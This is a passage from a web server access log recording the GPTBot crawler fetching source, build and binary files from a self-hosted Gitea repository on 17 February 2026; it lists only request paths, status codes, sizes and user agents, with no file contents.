192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:15:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 4663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:15:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" +[17/Feb/2026:15:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:15:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:15:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 17008] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:15:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 17009] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:15:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:15:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12013] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fassetpilot.ico" [Client 74.7.227.38] [Length 21540] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" +[17/Feb/2026:15:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibwinpthread-1.dll" [Client 74.7.227.38] [Length 23740] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:15:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2ffiles.zip" [Client 74.7.227.38] [Length 19737] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" +[17/Feb/2026:15:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2finstall.sh" [Client 74.7.227.38] [Length 25003] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" +[17/Feb/2026:15:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fAssetPilot.exe" [Client 74.7.227.38] [Length 20800] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" +[17/Feb/2026:15:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fAssetPilot.spec" [Client 74.7.227.38] [Length 22747] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" +[17/Feb/2026:15:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fGoldMonitor.exe" [Client 74.7.227.38] [Length 20815] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:15:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 10892] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" +[17/Feb/2026:15:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 10861] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" +[17/Feb/2026:15:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" +[17/Feb/2026:15:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 10861] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" +[17/Feb/2026:15:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7792] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" +[17/Feb/2026:15:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" +[17/Feb/2026:15:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" +[17/Feb/2026:15:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore?display=source" [Client 74.7.227.38] [Length 11132] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" +[17/Feb/2026:15:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 10856] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" +[17/Feb/2026:15:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" +[17/Feb/2026:15:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:15:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:15:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:15:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 27289] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:15:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:15:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 27323] [Gzip 14.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:15:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 1074] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:15:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 13189] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:15:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 6611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:15:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 74808] [Gzip 23.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:15:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 74840] [Gzip 23.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:15:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:15:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:15:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 1074] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:15:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 6611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:15:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 13221] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:15:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 28581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:15:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 28581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:15:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor.spec" [Client 74.7.227.38] [Length 25747] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:15:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor.log" [Client 74.7.227.38] [Length 25025] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 